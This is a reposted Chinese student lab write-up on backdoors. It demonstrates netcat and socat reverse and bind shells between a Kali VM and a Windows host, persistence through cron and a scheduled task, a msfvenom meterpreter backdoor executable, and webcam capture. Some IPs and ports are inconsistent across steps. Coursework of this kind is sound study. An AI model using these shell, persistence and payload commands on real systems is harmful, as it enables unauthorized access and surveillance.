ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

后门原理与实践

2022-04-02 01:35:05  阅读:245  来源: 互联网

标签:后门 1304 exe 主机 虚拟机 实践 192.168 获取 原理


实验内容

  • 1.使用netcat获取主机操作Shell,cron启动

  • 2.使用socat获取主机操作Shell, 任务计划启动

  • 3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  • 5.可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

一、使用netcat获取主机操作Shell,启动cron

主机IP:192.168.3.103

虚拟机kali的IP:192.168.226.137

虚拟机可以ping通主机

主机ping虚拟机发现TTL过期

修改服务

然后成功ping通虚拟机

使用netcat获取主机操作Shell,启动cron

在主机中获取虚拟机shell,虚拟机中使用nc 192.168.1.105(主机IP) 1304 -e /bin/sh连接主机反弹shell

成功getshell

在虚拟机中获取主机shell

在主机中用ncat -e cmd 192.168.226.137 1304,成功获取到主机shell

在虚拟机中启动cron并在主机监听,先在虚拟机上用crontab -e指令编辑一条定时任务(crontab指令增加一条定时任务,-e表示编辑,输入2表示选择vim编辑器)在最后一行添加24 * * * * nc 192.168.3.103 1304 -e /bin/sh,即在每个小时的第24分钟反向连接Windows主机的1304端口

等到每小时的24分,在ip地址为192.168.3.103的主机端用ncat -l -p 1304打开监听即可

二、使用socat获取主机操作Shell,任务计划启动

在Kali中用man socat查看使用说明

在Windows中按Win+R,再输入compmgmt.msc打开计算机管理

在系统工具中的任务计划程序中创建任务,设置任务名称,新建触发器

新建操作,操作设置为启动程序socat.exe,并添加参数tcp-listen:1304 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口1304,同时把cmd.exe的stderr重定向

在Kali中输入命令socat - tcp:192.168.3.103:1304 成功获取Windows的Shell

三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

主机IP发生了变化,依然ping的通

在Kali上生成后门可执行程序20191304_backdoor.exe
输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.226.137 LPORT=1304 -f exe > 20191304_backdoor.exe,其中

  • LHOST为反弹回连的IP,在这里是要反弹给Kali,也就是Kali的IP
  • LPORT是回连的端口
  • -p 使用的payload。
  • payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode。
  • -f 生成文件的类型
  • 输出到哪个文件

    在Windows上打开监听

    在Kali上用nc 192.168.43.145 1304 < 20191304_backdoor.exe将生成的20191304_backdoor.exe后门程序传过去

    在kali上使用msfconsole指令进入msf控制台
    对msf控制台进行配置

依次输入以下命令

use exploit/multi/handler		#使用监听模块,设置payload
set payload windows/meterpreter/reverse_tcp		#使用和生成后门程序时相同的payload
set LHOST 192.168.174.141			#KaliIP,和生成后门程序时指定的IP相同
set LPORT 1218


接着输入exploit进行监听,在Windows在打开20191304_backdoor.exe后成功获取到Windows的shell

四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

获取目标主机音频
输入webcam_snap指令控制摄像头进行拍照

标签:后门,1304,exe,主机,虚拟机,实践,192.168,获取,原理
来源: https://www.cnblogs.com/shoudeyunkaijianyueming/p/16089102.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有